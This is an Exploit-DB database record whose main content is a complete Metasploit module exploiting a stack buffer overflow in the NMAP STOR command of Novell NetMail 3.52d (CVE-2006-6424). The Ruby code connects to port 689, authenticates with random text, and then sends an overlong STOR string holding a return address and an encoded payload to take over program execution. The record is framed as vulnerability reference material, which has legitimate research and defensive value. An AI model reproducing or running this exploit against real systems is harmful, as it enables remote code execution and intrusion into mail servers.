{"id": "EDB-ID:16813", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Novell NetMail 3.52d - NMAP STOR Buffer Overflow (Metasploit)", "description": "", "published": "2010-05-09T00:00:00", "modified": "2010-05-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/16813", "reporter": "Metasploit", "references": [], "cvelist": ["2006-6424"], "immutableFields": [], "lastseen": "2022-08-16T02:46:58", "viewCount": 12, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2006-6424"]}]}, "exploitation": null, "vulnersScore": 0.3}, "_state": {"dependencies": 1661182887, "score": 1661184847, "epss": 1678791570}, "_internal": {"score_hash": "29a81afa0369a879d467a9ab056e7970"}, "sourceHref": "https://www.exploit-db.com/download/16813", "sourceData": "##\r\n# $Id: nmap_stor.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Novell NetMail <= 3.52d NMAP STOR Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\r\n\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\r\n\t\t\t\tbuffer and control program execution.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-6424' ],\r\n\t\t\t\t\t[ 'OSVDB', '31363' ],\r\n\t\t\t\t\t[ 'BID', '21725' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 500,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows 2000 Pro SP4 English', { 'Ret' => 0x7cdc97fb }],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 23 2006'))\r\n\r\n\t\tregister_options([Opt::RPORT(689)], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\t\tsock.get_once\r\n\r\n\t\tauth = \"USER \" + rand_text_english(10)\r\n\t\tsock.put(auth + \"\\r\\n\")\r\n\r\n\t\tres = sock.get_once\r\n\r\n\t\tsploit = \"STOR \" + rand_text_english(253) + [ target.ret ].pack('V')\r\n\t\tsploit << \" \" + rand_text_english(20) + \"\\r\\n\" + payload.encoded\r\n\r\n\t\tif (res =~ /1000/)\r\n\t\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\t\tsock.put(sploit)\r\n\t\telse\r\n\t\t\tprint_status(\"Not in Trusted Hosts.\")\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\nend", "osvdbidlist": ["31363"], "exploitType": "remote", "verified": true}
{}
Novell NetMail 3.52d - NMAP STOR Buffer Overflow (Metasploit)